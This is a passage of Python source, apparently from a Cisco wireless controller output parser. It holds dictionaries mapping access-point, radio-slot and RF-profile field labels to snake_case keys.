'boot_version',\n 'Mini IOS Version': 'mini_ios_version',\n 'Stats Reporting Period': 'stats_reporting_period',\n 'Stats Collection Mode': 'stats_collection_mode',\n 'Radio Core Mode': 'radio_core_mode',\n 'Slub Debug Mode': 'slub_debug_mode',\n 'LED State': 'led_state',\n 'PoE Pre-Standard Switch': 'poe_pre_standard_switch',\n 'PoE Power Injector MAC Addr': 'poe_power_injector_mac_addr',\n 'Power Type/Mode': 'power_type_mode',\n 'Number Of Slots': 'number_of_slots',\n 'AP Model': 'ap_model',\n 'AP Image': 'ap_image',\n 'IOS Version': 'ios_version',\n 'Reset Button': 'reset_button',\n 'AP Serial Number': 'ap_serial_number',\n 'AP Certificate Type': 'ap_certificate_type',\n 'AP Lag Status': 'ap_lag_status',\n 'AP User Mode': 'ap_user_mode',\n 'AP User Name': 'ap_user_name',\n 'AP Dot1x User Mode': 'ap_dot1x_user_mode',\n 'AP Dot1x User Name': 'ap_dot1x_user_name',\n 'Cisco AP system logging host': 'cisco_ap_system_logging_host',\n 'AP Core Dump Config': 'ap_core_dump_config',\n 'AP Up Time': 'ap_up_time',\n 'AP LWAPP Up Time': 'ap_lwapp_up_time',\n 'Join Date and Time': 'join_date_and_time',\n 'Join Taken Time': 'join_taken_time',\n 
'Attributes for Slot 0': 'slot_0',\n 'Radio Type': 'slot_0_radio_type',\n 'Radio Subtype': 'slot_0_radio_subtype',\n 'Assignment Method': 'slot_0_radio_role_assignment_method',\n 'Band': 'slot_0_radio_role_band',\n 'Current CCA Mode': 'slot_0_phy_dsss_parameters_current_cca_mode',\n 'ED Threshold': 'slot_0_phy_dsss_parameters_ed_threshold',\n 'Administrative State1': 'slot_0_administrative_state',\n 'Operation State1': 'slot_0_operation_state',\n 'Mesh Radio Role': 'slot_0_mesh_radio_role',\n 'Radio Role': 'slot_0_radio_role',\n 'CellId': 'slot_0_cellid',\n 'Station Configuration': 'slot_0_station_configuration',\n 'Configuration': 'slot_0_configuration',\n 'Number Of WLANs': 'slot_0_number_of_wlans',\n 'Medium Occupancy Limit': 'slot_0_medium_occupancy_limit',\n 'CFP Period': 'slot_0_cfp_period',\n 'CFP MaxDuration': 'slot_0_cfp_maxduration',\n 'BSSID': 'slot_0_bssid',\n 'Operation Rate Set': 'slot_0_operation_rate_set',\n '6000 Kilo Bits': 'slot_0_operation_rate_set_6000_kilo_bits',\n '9000 Kilo Bits': 'slot_0_operation_rate_set_9000_kilo_bits',\n '5500 Kilo Bits': 'slot_0_operation_rate_set_5500_kilo_bits',\n '1000 Kilo Bits': 'slot_0_operation_rate_set_1000_kilo_bits',\n '2000 Kilo Bits': 'slot_0_operation_rate_set_2000_kilo_bits',\n '11000 Kilo Bits': 'slot_0_operation_rate_set_11000_kilo_bits',\n '12000 Kilo Bits': 'slot_0_operation_rate_set_12000_kilo_bits',\n '18000 Kilo Bits': 'slot_0_operation_rate_set_18000_kilo_bits',\n '24000 Kilo Bits': 'slot_0_operation_rate_set_24000_kilo_bits',\n '36000 Kilo Bits': 'slot_0_operation_rate_set_36000_kilo_bits',\n '48000 Kilo Bits': 'slot_0_operation_rate_set_48000_kilo_bits',\n '54000 Kilo Bits': 'slot_0_operation_rate_set_54000_kilo_bits',\n 'MCS Set': 'slot_0_mcs_set',\n 'MCS 0': 'slot_0_mcs_set_mcs_0',\n 'MCS 1': 'slot_0_mcs_set_mcs_1',\n 'MCS 2': 'slot_0_mcs_set_mcs_2',\n 'MCS 3': 'slot_0_mcs_set_mcs_3',\n 'MCS 4': 'slot_0_mcs_set_mcs_4',\n 'MCS 5': 'slot_0_mcs_set_mcs_5',\n 'MCS 6': 'slot_0_mcs_set_mcs_6',\n 'MCS 7': 'slot_0_mcs_set_mcs_7',\n 'MCS 8': 'slot_0_mcs_set_mcs_8',\n 'MCS 9': 'slot_0_mcs_set_mcs_9',\n 'MCS 10': 'slot_0_mcs_set_mcs_10',\n 'MCS 11': 'slot_0_mcs_set_mcs_11',\n 'MCS 12': 'slot_0_mcs_set_mcs_12',\n 'MCS 13': 'slot_0_mcs_set_mcs_13',\n 'MCS 14': 'slot_0_mcs_set_mcs_14',\n 'MCS 15': 'slot_0_mcs_set_mcs_15',\n 'MCS 16': 'slot_0_mcs_set_mcs_16',\n 'MCS 17': 'slot_0_mcs_set_mcs_17',\n 'MCS 18': 'slot_0_mcs_set_mcs_18',\n 'MCS 19': 'slot_0_mcs_set_mcs_19',\n 'MCS 20': 'slot_0_mcs_set_mcs_20',\n 'MCS 21': 'slot_0_mcs_set_mcs_21',\n 'MCS 22': 'slot_0_mcs_set_mcs_22',\n 'MCS 23': 'slot_0_mcs_set_mcs_23',\n 'MCS 24': 'slot_0_mcs_set_mcs_24',\n 'MCS 25': 'slot_0_mcs_set_mcs_25',\n 'MCS 26': 'slot_0_mcs_set_mcs_26',\n 'MCS 27': 'slot_0_mcs_set_mcs_27',\n 'MCS 28': 'slot_0_mcs_set_mcs_28',\n 'MCS 29': 'slot_0_mcs_set_mcs_29',\n 'MCS 30': 'slot_0_mcs_set_mcs_30',\n 'MCS 31': 'slot_0_mcs_set_mcs_31',\n '802.11ac MCS Set': 'slot_0_802_11ac_mcs_set',\n 'Nss=1: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-7': 'slot_0_802_11ac_mcs_set_nss_4_mcs_0_7',\n 'Phy DSSS parameters': 'slot_0_phy_dsss_parameters',\n 'Rogue BSSID': 'slot_0_containment_count_rogue_bssid',\n 'Containment Type': 'slot_0_containment_count_rogue_bssid_containment_type',\n 'Channel Count': 'slot_0_containment_count_rogue_bssid_channel_count',\n 'Beacon Period': 'slot_0_beacon_period',\n 'Fragmentation Threshold': 
'slot_0_fragmentation_threshold',\n 'Multi Domain Capability Implemented': 'slot_0_multi_domain_capability_implemented',\n 'Multi Domain Capability Enabled': 'slot_0_multi_domain_capability_enabled',\n 'Country String': 'slot_0_country_string',\n 'Multi Domain Capability': 'slot_0_multi_domain_capability',\n 'Configuration1': 'slot_0_multi_domain_capability_configuration',\n 'First Chan Num': 'slot_0_multi_domain_capability_first_chan_num',\n 'Number Of Channels': 'slot_0_multi_domain_capability_number_of_channels',\n 'MAC Operation Parameters': 'slot_0_mac_operation_parameters',\n 'Configuration2': 'slot_0_mac_operation_parameters_configuration',\n 'Fragmentation Threshold1': 'slot_0_mac_operation_parameters_fragmentation_threshold',\n 'Packet Retry Limit': 'slot_0_mac_operation_parameters_packet_retry_limit',\n 'Tx Power': 'slot_0_tx_power',\n 'Num Of Supported Power Levels': 'slot_0_tx_power_num_of_supported_power_levels',\n 'Tx Power Level 1': 'slot_0_tx_power_tx_power_level_1',\n 'Tx Power Level 2': 'slot_0_tx_power_tx_power_level_2',\n 'Tx Power Level 3': 'slot_0_tx_power_tx_power_level_3',\n 'Tx Power Level 4': 'slot_0_tx_power_tx_power_level_4',\n 'Tx Power Level 5': 'slot_0_tx_power_tx_power_level_5',\n 'Tx Power Level 6': 'slot_0_tx_power_tx_power_level_6',\n 'Tx Power Level 7': 'slot_0_tx_power_tx_power_level_7',\n 'Tx Power Level 8': 'slot_0_tx_power_tx_power_level_8',\n 'Tx Power Configuration': 'slot_0_tx_power_tx_power_configuration',\n 'Current Tx Power Level': 'slot_0_tx_power_current_tx_power_level',\n 'Tx Power Assigned By': 'slot_0_tx_power_tx_power_assigned_by',\n 'Phy OFDM parameters': 'slot_0_phy_ofdm_parameters',\n 'Configuration3': 'slot_0_phy_ofdm_parameters_configuration',\n 'Current Channel': 'slot_0_phy_ofdm_parameters_current_channel',\n 'Channel Assigned By': 'slot_0_phy_ofdm_parameters_channel_assigned_by',\n 'Extension Channel': 'slot_0_phy_ofdm_parameters_extension_channel',\n 'Channel Width': 'slot_0_phy_ofdm_parameters_channel_width',\n 'Allowed Channel List': 'slot_0_phy_ofdm_parameters_allowed_channel_list',\n '': 'slot_0_phy_ofdm_parameters_allowed_channel_list_',\n 'TI Threshold': 'slot_0_phy_ofdm_parameters_ti_threshold',\n 'DCA Channel List': 'slot_0_phy_ofdm_parameters_dca_channel_list',\n 'Legacy Tx Beamforming Configuration': 'slot_0_phy_ofdm_parameters_legacy_tx_beamforming_configuration',\n 'Legacy Tx Beamforming': 'slot_0_phy_ofdm_parameters_legacy_tx_beamforming',\n 'Antenna Type': 'slot_0_phy_ofdm_parameters_antenna_type',\n 'Internal Antenna Gain (in .5 dBi units)': 'slot_0_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units',\n 'Diversity': 'slot_0_phy_ofdm_parameters_diversity',\n '802.11n Antennas': 'slot_0_phy_ofdm_parameters_802_11n_antennas',\n 'A': 'slot_0_phy_ofdm_parameters_802_11n_antennas_a',\n 'B': 'slot_0_phy_ofdm_parameters_802_11n_antennas_b',\n 'C': 'slot_0_phy_ofdm_parameters_802_11n_antennas_c',\n 'D': 'slot_0_phy_ofdm_parameters_802_11n_antennas_d',\n 'Performance Profile Parameters': 'slot_0_performance_profile_parameters',\n 'Configuration4': 'slot_0_performance_profile_parameters_configuration',\n 'Interference threshold': 'slot_0_performance_profile_parameters_interference_threshold',\n 'Noise threshold': 'slot_0_performance_profile_parameters_noise_threshold',\n 'RF utilization threshold': 'slot_0_performance_profile_parameters_rf_utilization_threshold',\n 'Data-rate threshold': 'slot_0_performance_profile_parameters_data_rate_threshold',\n 'Client threshold': 
'slot_0_performance_profile_parameters_client_threshold',\n 'Coverage SNR threshold': 'slot_0_performance_profile_parameters_coverage_snr_threshold',\n 'Coverage exception level': 'slot_0_performance_profile_parameters_coverage_exception_level',\n 'Client minimum exception level': 'slot_0_performance_profile_parameters_client_minimum_exception_level',\n 'Rogue Containment Information': 'slot_0_rogue_containment_information',\n 'Containment Count': 'slot_0_containment_count',\n 'CleanAir Management Information': 'slot_0_cleanair_management_information',\n 'CleanAir Capable': 'slot_0_cleanair_management_information_cleanair_capable',\n 'CleanAir Management Administration St': 'slot_0_cleanair_management_information_cleanair_management_administration_st',\n 'CleanAir Management Operation State': 'slot_0_cleanair_management_information_cleanair_management_operation_state',\n 'Rapid Update Mode': 'slot_0_cleanair_management_information_rapid_update_mode',\n 'Spectrum Expert connection': 'slot_0_cleanair_management_information_spectrum_expert_connection',\n 'CleanAir NSI Key': 'slot_0_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key',\n 'Spectrum Expert Connections counter': 'slot_0_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter',\n 'CleanAir Sensor State': 'slot_0_cleanair_management_information_cleanair_sensor_state',\n 'Radio Extended Configurations': 'slot_0_radio_extended_configurations',\n 'Beacon period': 'slot_0_radio_extended_configurations_beacon_period',\n 'Beacon range': 'slot_0_radio_extended_configurations_beacon_range',\n 'Multicast buffer': 'slot_0_radio_extended_configurations_multicast_buffer',\n 'Multicast data-rate': 'slot_0_radio_extended_configurations_multicast_data_rate',\n 'RX SOP threshold': 'slot_0_radio_extended_configurations_rx_sop_threshold',\n 'CCA threshold': 'slot_0_radio_extended_configurations_cca_threshold',\n 'Attributes for Slot 1': 'slot_1',\n 'Radio Type1': 'slot_1_radio_type',\n 'Radio Subband': 'slot_1_radio_subband',\n 'Administrative State2': 'slot_1_administrative_state',\n 'Operation State2': 'slot_1_operation_state',\n 'Mesh Radio Role1': 'slot_1_mesh_radio_role',\n 'Radio Role1': 'slot_1_radio_role',\n 'CellId1': 'slot_1_cellid',\n 'Station Configuration1': 'slot_1_station_configuration',\n 'Configuration5': 'slot_1_configuration',\n 'Number Of WLANs1': 'slot_1_number_of_wlans',\n 'Medium Occupancy Limit1': 'slot_1_medium_occupancy_limit',\n 'CFP Period1': 'slot_1_cfp_period',\n 'CFP MaxDuration1': 'slot_1_cfp_maxduration',\n 'BSSID1': 'slot_1_bssid',\n 'Operation Rate Set1': 'slot_1_operation_rate_set',\n '6000 Kilo Bits1': 'slot_1_operation_rate_set_6000_kilo_bits',\n '9000 Kilo Bits1': 'slot_1_operation_rate_set_9000_kilo_bits',\n '12000 Kilo Bits1': 'slot_1_operation_rate_set_12000_kilo_bits',\n '18000 Kilo Bits1': 'slot_1_operation_rate_set_18000_kilo_bits',\n '24000 Kilo Bits1': 'slot_1_operation_rate_set_24000_kilo_bits',\n '36000 Kilo Bits1': 'slot_1_operation_rate_set_36000_kilo_bits',\n '48000 Kilo Bits1': 'slot_1_operation_rate_set_48000_kilo_bits',\n '54000 Kilo Bits1': 'slot_1_operation_rate_set_54000_kilo_bits',\n 'MCS Set1': 'slot_1_mcs_set',\n 'MCS 01': 'slot_1_mcs_set_mcs_0',\n 'MCS 32': 'slot_1_mcs_set_mcs_3',\n 'MCS 41': 'slot_1_mcs_set_mcs_4',\n 'MCS 51': 'slot_1_mcs_set_mcs_5',\n 'MCS 61': 'slot_1_mcs_set_mcs_6',\n 'MCS 71': 'slot_1_mcs_set_mcs_7',\n 'MCS 81': 'slot_1_mcs_set_mcs_8',\n 'MCS 91': 'slot_1_mcs_set_mcs_9',\n 'MCS 101': 
'slot_1_mcs_set_mcs_10',\n 'MCS 111': 'slot_1_mcs_set_mcs_11',\n 'MCS 121': 'slot_1_mcs_set_mcs_12',\n 'MCS 131': 'slot_1_mcs_set_mcs_13',\n 'MCS 141': 'slot_1_mcs_set_mcs_14',\n 'MCS 151': 'slot_1_mcs_set_mcs_15',\n 'MCS 161': 'slot_1_mcs_set_mcs_16',\n 'MCS 171': 'slot_1_mcs_set_mcs_17',\n 'MCS 181': 'slot_1_mcs_set_mcs_18',\n 'MCS 191': 'slot_1_mcs_set_mcs_19',\n 'MCS 201': 'slot_1_mcs_set_mcs_20',\n 'MCS 211': 'slot_1_mcs_set_mcs_21',\n 'MCS 221': 'slot_1_mcs_set_mcs_22',\n 'MCS 231': 'slot_1_mcs_set_mcs_23',\n 'MCS 241': 'slot_1_mcs_set_mcs_24',\n 'MCS 251': 'slot_1_mcs_set_mcs_25',\n 'MCS 261': 'slot_1_mcs_set_mcs_26',\n 'MCS 271': 'slot_1_mcs_set_mcs_27',\n 'MCS 281': 'slot_1_mcs_set_mcs_28',\n 'MCS 291': 'slot_1_mcs_set_mcs_29',\n 'MCS 301': 'slot_1_mcs_set_mcs_30',\n 'MCS 311': 'slot_1_mcs_set_mcs_31',\n '802.11ac MCS Set1': 'slot_1_802_11ac_mcs_set',\n 'Nss=1: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-71': 'slot_1_802_11ac_mcs_set_nss_4_mcs_0_7',\n 'Nss=4: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_4_mcs_0_9',\n 'Beacon Period1': 'slot_1_beacon_period',\n 'Fragmentation Threshold2': 'slot_1_fragmentation_threshold',\n 'Multi Domain Capability Implemented1': 'slot_1_multi_domain_capability_implemented',\n 'Multi Domain Capability Enabled1': 'slot_1_multi_domain_capability_enabled',\n 'Country String1': 'slot_1_country_string',\n 'Multi Domain Capability1': 'slot_1_multi_domain_capability',\n 'Configuration6': 'slot_1_multi_domain_capability_configuration',\n 'First Chan Num1': 'slot_1_multi_domain_capability_first_chan_num',\n 'Number Of Channels1': 'slot_1_multi_domain_capability_number_of_channels',\n 'MAC Operation Parameters1': 'slot_1_mac_operation_parameters',\n 'Configuration7': 'slot_1_mac_operation_parameters_configuration',\n 'Fragmentation Threshold3': 'slot_1_mac_operation_parameters_fragmentation_threshold',\n 'Packet Retry Limit1': 'slot_1_mac_operation_parameters_packet_retry_limit',\n 'Tx Power1': 'slot_1_tx_power',\n 'Num Of Supported Power Levels1': 'slot_1_tx_power_num_of_supported_power_levels',\n 'Tx Power Level 11': 'slot_1_tx_power_tx_power_level_1',\n 'Tx Power Level 21': 'slot_1_tx_power_tx_power_level_2',\n 'Tx Power Level 31': 'slot_1_tx_power_tx_power_level_3',\n 'Tx Power Level 41': 'slot_1_tx_power_tx_power_level_4',\n 'Tx Power Level 51': 'slot_1_tx_power_tx_power_level_5',\n 'Tx Power Level 61': 'slot_1_tx_power_tx_power_level_6',\n 'Tx Power Level 71': 'slot_1_tx_power_tx_power_level_7',\n 'Tx Power Level 81': 'slot_1_tx_power_tx_power_level_8',\n 'Tx Power Configuration1': 'slot_1_tx_power_tx_power_configuration',\n 'Current Tx Power Level1': 'slot_1_tx_power_current_tx_power_level',\n 'Tx Power Assigned By1': 'slot_1_tx_power_tx_power_assigned_by',\n 'Phy OFDM parameters1': 'slot_1_phy_ofdm_parameters',\n 'Configuration8': 'slot_1_phy_ofdm_parameters_configuration',\n 'Current Channel1': 'slot_1_phy_ofdm_parameters_current_channel',\n 'Channel Assigned By1': 'slot_1_phy_ofdm_parameters_channel_assigned_by',\n 'Extension Channel1': 'slot_1_phy_ofdm_parameters_extension_channel',\n 'Channel Width1': 'slot_1_phy_ofdm_parameters_channel_width',\n 'Allowed Channel List1': 'slot_1_phy_ofdm_parameters_allowed_channel_list',\n '1': 'slot_1_phy_ofdm_parameters_allowed_channel_list_',\n 'TI Threshold1': 'slot_1_phy_ofdm_parameters_ti_threshold',\n 'DCA Channel List1': 
'slot_1_phy_ofdm_parameters_dca_channel_list',\n 'Legacy Tx Beamforming Configuration1': 'slot_1_phy_ofdm_parameters_legacy_tx_beamforming_configuration',\n 'Legacy Tx Beamforming1': 'slot_1_phy_ofdm_parameters_legacy_tx_beamforming',\n 'Antenna Type1': 'slot_1_phy_ofdm_parameters_antenna_type',\n 'Internal Antenna Gain (in .5 dBi units)1': 'slot_1_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units',\n 'Diversity1': 'slot_1_phy_ofdm_parameters_diversity',\n '802.11n Antennas1': 'slot_1_phy_ofdm_parameters_802_11n_antennas',\n 'A1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_a',\n 'B1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_b',\n 'C1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_c',\n 'D1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_d',\n 'Performance Profile Parameters1': 'slot_1_performance_profile_parameters',\n 'Interference threshold1': 'slot_1_performance_profile_parameters_interference_threshold',\n 'Noise threshold1': 'slot_1_performance_profile_parameters_noise_threshold',\n 'RF utilization threshold1': 'slot_1_performance_profile_parameters_rf_utilization_threshold',\n 'Data-rate threshold1': 'slot_1_performance_profile_parameters_data_rate_threshold',\n 'Client threshold1': 'slot_1_performance_profile_parameters_client_threshold',\n 'Coverage SNR threshold1': 'slot_1_performance_profile_parameters_coverage_snr_threshold',\n 'Coverage exception level1': 'slot_1_performance_profile_parameters_coverage_exception_level',\n 'Client minimum exception level1': 'slot_1_performance_profile_parameters_client_minimum_exception_level',\n 'Rogue Containment Information1': 'slot_1_rogue_containment_information',\n 'Containment Count1': 'slot_1_containment_count',\n 'CleanAir Management Information1': 'slot_1_cleanair_management_information',\n 'CleanAir Capable1': 'slot_1_cleanair_management_information_cleanair_capable',\n 'CleanAir Management Administration St1': 'slot_1_cleanair_management_information_cleanair_management_administration_st',\n 'CleanAir Management Operation State1': 'slot_1_cleanair_management_information_cleanair_management_operation_state',\n 'Rapid Update Mode1': 'slot_1_cleanair_management_information_rapid_update_mode',\n 'Spectrum Expert connection1': 'slot_1_cleanair_management_information_spectrum_expert_connection',\n 'CleanAir NSI Key1': 'slot_1_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key',\n 'Spectrum Expert Connections counter1': 'slot_1_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter',\n 'CleanAir Sensor State1': 'slot_1_cleanair_management_information_cleanair_sensor_state',\n 'Radio Extended Configurations1': 'slot_1_radio_extended_configurations',\n 'Beacon period1': 'slot_1_radio_extended_configurations_beacon_period',\n 'Beacon range1': 'slot_1_radio_extended_configurations_beacon_range',\n 'Multicast buffer1': 'slot_1_radio_extended_configurations_multicast_buffer',\n 'Multicast data-rate1': 'slot_1_radio_extended_configurations_multicast_data_rate',\n 'RX SOP threshold1': 'slot_1_radio_extended_configurations_rx_sop_threshold',\n 'CCA threshold1': 'slot_1_radio_extended_configurations_cca_threshold',\n}\n\nap_rf_parsing_dict = {\n 'AP Name': 'ap_name',\n 'MAC Address': 'mac_address',\n 'Slot ID': 'slot_id',\n 'Radio Type': 'radio_type',\n 'Sub-band Type': 'sub_band_type',\n 'Noise Profile': 'noise_profile',\n 'Channel 1': 'noise_profile_channel_1',\n 'Channel 2': 'noise_profile_channel_2',\n 'Channel 3': 'noise_profile_channel_3',\n 'Channel 4': 
'noise_profile_channel_4',\n 'Channel 5': 'noise_profile_channel_5',\n 'Channel 6': 'noise_profile_channel_6',\n 'Channel 7': 'noise_profile_channel_7',\n 'Channel 8': 'noise_profile_channel_8',\n 'Channel 9': 'noise_profile_channel_9',\n 'Channel 10': 'noise_profile_channel_10',\n 'Channel 11': 'noise_profile_channel_11',\n 'Channel 12': 'noise_profile_channel_12',\n 'Channel 13': 'noise_profile_channel_13',\n 'Channel 14': 'noise_profile_channel_14',\n 'Channel 34': 'noise_profile_channel_34',\n 'Channel 36': 'noise_profile_channel_36',\n 'Channel 38': 'noise_profile_channel_38',\n 'Channel 40': 'noise_profile_channel_40',\n 'Channel 42': 'noise_profile_channel_42',\n 'Channel 44': 'noise_profile_channel_44',\n 'Channel 46': 'noise_profile_channel_46',\n 'Channel 48': 'noise_profile_channel_48',\n 'Channel 52': 'noise_profile_channel_52',\n 'Channel 56': 'noise_profile_channel_56',\n 'Channel 60': 'noise_profile_channel_60',\n 'Channel 64': 'noise_profile_channel_64',\n 'Channel 100': 'noise_profile_channel_100',\n 'Channel 104': 'noise_profile_channel_104',\n 'Channel 108': 'noise_profile_channel_108',\n 'Channel 112': 'noise_profile_channel_112',\n 'Channel 116': 'noise_profile_channel_116',\n 'Channel 120': 'noise_profile_channel_120',\n 'Channel 124': 'noise_profile_channel_124',\n 'Channel 128': 'noise_profile_channel_128',\n 'Channel 132': 'noise_profile_channel_132',\n 'Channel 136': 'noise_profile_channel_136',\n 'Channel 140': 'noise_profile_channel_140',\n 'Channel 144': 'noise_profile_channel_144',\n 'Channel 149': 'noise_profile_channel_149',\n 'Channel 153': 'noise_profile_channel_153',\n 'Channel 157': 'noise_profile_channel_157',\n 'Channel 161': 'noise_profile_channel_161',\n 'Channel 165': 'noise_profile_channel_165',\n 'Channel 169': 'noise_profile_channel_169',\n 'Channel 173': 'noise_profile_channel_173',\n 'Interference Profile': 'interference_profile',\n 'Channel 15': 'interference_profile_channel_1',\n 'Channel 21': 'interference_profile_channel_2',\n 'Channel 31': 'interference_profile_channel_3',\n 'Channel 41': 'interference_profile_channel_4',\n 'Channel 51': 'interference_profile_channel_5',\n 'Channel 61': 'interference_profile_channel_6',\n 'Channel 71': 'interference_profile_channel_7',\n 'Channel 81': 'interference_profile_channel_8',\n 'Channel 91': 'interference_profile_channel_9',\n 'Channel 101': 'interference_profile_channel_10',\n 'Channel 111': 'interference_profile_channel_11',\n 'Channel 121': 'interference_profile_channel_12',\n 'Channel 131': 'interference_profile_channel_13',\n 'Channel 141': 'interference_profile_channel_14',\n 'Channel 341': 'interference_profile_channel_34',\n 'Channel 361': 'interference_profile_channel_36',\n 'Channel 381': 'interference_profile_channel_38',\n 'Channel 401': 'interference_profile_channel_40',\n 'Channel 421': 'interference_profile_channel_42',\n 'Channel 441': 'interference_profile_channel_44',\n 'Channel 461': 'interference_profile_channel_46',\n 'Channel 481': 'interference_profile_channel_48',\n 'Channel 521': 'interference_profile_channel_52',\n 'Channel 561': 'interference_profile_channel_56',\n 'Channel 601': 'interference_profile_channel_60',\n 'Channel 641': 'interference_profile_channel_64',\n 'Channel 1001': 'interference_profile_channel_100',\n 'Channel 1041': 'interference_profile_channel_104',\n 'Channel 1081': 'interference_profile_channel_108',\n 'Channel 1121': 'interference_profile_channel_112',\n 'Channel 1161': 'interference_profile_channel_116',\n 'Channel 1201': 
'interference_profile_channel_120',\n 'Channel 1241': 'interference_profile_channel_124',\n 'Channel 1281': 'interference_profile_channel_128',\n 'Channel 1321': 'interference_profile_channel_132',\n 'Channel 1361': 'interference_profile_channel_136',\n 'Channel 1401': 'interference_profile_channel_140',\n 'Channel 1441': 'interference_profile_channel_144',\n 'Channel 1491': 'interference_profile_channel_149',\n 'Channel 1531': 'interference_profile_channel_153',\n 'Channel 1571': 'interference_profile_channel_157',\n 'Channel 1611': 'interference_profile_channel_161',\n 'Channel 1651': 'interference_profile_channel_165',\n 'Channel 1691': 'interference_profile_channel_169',\n 'Channel 1731': 'interference_profile_channel_173',\n 'Rogue Histogram': 'rogue_histogram',\n 'Channel 16': 'rogue_histogram_channel_1',\n 'Channel 22': 'rogue_histogram_channel_2',\n 'Channel 32': 'rogue_histogram_channel_3',\n 'Channel 43': 'rogue_histogram_channel_4',\n 'Channel 53': 'rogue_histogram_channel_5',\n 'Channel 62': 'rogue_histogram_channel_6',\n 'Channel 72': 'rogue_histogram_channel_7',\n 'Channel 82': 'rogue_histogram_channel_8',\n 'Channel 92': 'rogue_histogram_channel_9',\n 'Channel 102': 'rogue_histogram_channel_10',\n 'Channel 113': 'rogue_histogram_channel_11',\n 'Channel 122': 'rogue_histogram_channel_12',\n 'Channel 133': 'rogue_histogram_channel_13',\n 'Channel 142': 'rogue_histogram_channel_14',\n 'Channel 342': 'rogue_histogram_channel_34',\n 'Channel 362': 'rogue_histogram_channel_36',\n 'Channel 382': 'rogue_histogram_channel_38',\n 'Channel 402': 'rogue_histogram_channel_40',\n 'Channel 422': 'rogue_histogram_channel_42',\n 'Channel 442': 'rogue_histogram_channel_44',\n 'Channel 462': 'rogue_histogram_channel_46',\n 'Channel 482': 'rogue_histogram_channel_48',\n 'Channel 522': 'rogue_histogram_channel_52',\n 'Channel 562': 'rogue_histogram_channel_56',\n 'Channel 602': 'rogue_histogram_channel_60',\n 'Channel 642': 'rogue_histogram_channel_64',\n 'Channel 1002': 'rogue_histogram_channel_100',\n 'Channel 1042': 'rogue_histogram_channel_104',\n 'Channel 1082': 'rogue_histogram_channel_108',\n 'Channel 1122': 'rogue_histogram_channel_112',\n 'Channel 1162': 'rogue_histogram_channel_116',\n 'Channel 1202': 'rogue_histogram_channel_120',\n 'Channel 1242': 'rogue_histogram_channel_124',\n 'Channel 1282': 'rogue_histogram_channel_128',\n 'Channel 1322': 'rogue_histogram_channel_132',\n 'Channel 1362': 'rogue_histogram_channel_136',\n 'Channel 1402': 'rogue_histogram_channel_140',\n 'Channel 1442': 'rogue_histogram_channel_144',\n 'Channel 1492': 'rogue_histogram_channel_149',\n 'Channel 1532': 'rogue_histogram_channel_153',\n 'Channel 1572': 'rogue_histogram_channel_157',\n 'Channel 1612': 'rogue_histogram_channel_161',\n 'Channel 1652': 'rogue_histogram_channel_165',\n 'Channel 1692': 'rogue_histogram_channel_169',\n 'Channel 1732': 'rogue_histogram_channel_173',\n 'Load Profile': 'load_profile',\n 'Receive Utilization': 'load_profile_receive_utilization',\n 'Transmit Utilization': 'load_profile_transmit_utilization',\n 'Channel Utilization': 'load_profile_channel_utilization',\n 'Attached Clients': 'load_profile_attached_clients',\n 'Coverage Profile': 'coverage_profile',\n 'Failed Clients': 'failed_clients',\n 'Client Signal Strengths': 'client_signal_strengths',\n 'RSSI -100 dbm': 'client_signal_strengths_rssi_100_dbm',\n 'RSSI -92 dbm': 'client_signal_strengths_rssi_92_dbm',\n 'RSSI -84 dbm': 'client_signal_strengths_rssi_84_dbm',\n 'RSSI -76 dbm': 'client_signal_strengths_rssi_76_dbm',\n 
'RSSI -68 dbm': 'client_signal_strengths_rssi_68_dbm',\n 'RSSI -60 dbm': 'client_signal_strengths_rssi_60_dbm',\n 'RSSI -52 dbm': 'client_signal_strengths_rssi_52_dbm',\n 'Client Signal To Noise Ratios': 'client_signal_to_noise_ratios',\n 'SNR 0 dB': 'client_signal_to_noise_ratios_snr_0_db',\n 'SNR 5 dB': 'client_signal_to_noise_ratios_snr_5_db',\n 'SNR 10 dB': 'client_signal_to_noise_ratios_snr_10_db',\n 'SNR 15 dB': 'client_signal_to_noise_ratios_snr_15_db',\n 'SNR 20 dB': 'client_signal_to_noise_ratios_snr_20_db',\n 'SNR 25 dB': 'client_signal_to_noise_ratios_snr_25_db',\n 'SNR 30 dB': 'client_signal_to_noise_ratios_snr_30_db',\n 'SNR 35 dB': 'client_signal_to_noise_ratios_snr_35_db',\n 'SNR 40 dB': 'client_signal_to_noise_ratios_snr_40_db',\n 'SNR 45 dB': 'client_signal_to_noise_ratios_snr_45_db',\n 'Radar Information': 'radar_information',\n 'Channel Assignment Information': 'channel_assignment_information',\n 'Current Channel Average Energy': 'channel_assignment_information_current_channel_average_energy',\n 'Previous Channel Average Energy': 'channel_assignment_information_previous_channel_average_energy',\n 'Channel Change Count': 'channel_assignment_information_channel_change_count',\n 'Last Channel Change Time': 'channel_assignment_information_last_channel_change_time',\n 'Recommended Best Channel': 'channel_assignment_information_recommended_best_channel',\n 'RF Parameter Recommendations': 'rf_parameter_recommendations',\n 'Power Level': 'rf_parameter_recommendations_power_level',\n 'RTS/CTS Threshold': 'rf_parameter_recommendations_rts_cts_threshold',\n 'Fragmentation Threshold': 'rf_parameter_recommendations_fragmentation_threshold',\n 'Antenna Pattern': 'rf_parameter_recommendations_antenna_pattern',\n}\n\nnetwork_config_parsing_dict = {\n 'RF-Network Name': 'rf_network_name',\n 'DNS Server IP': 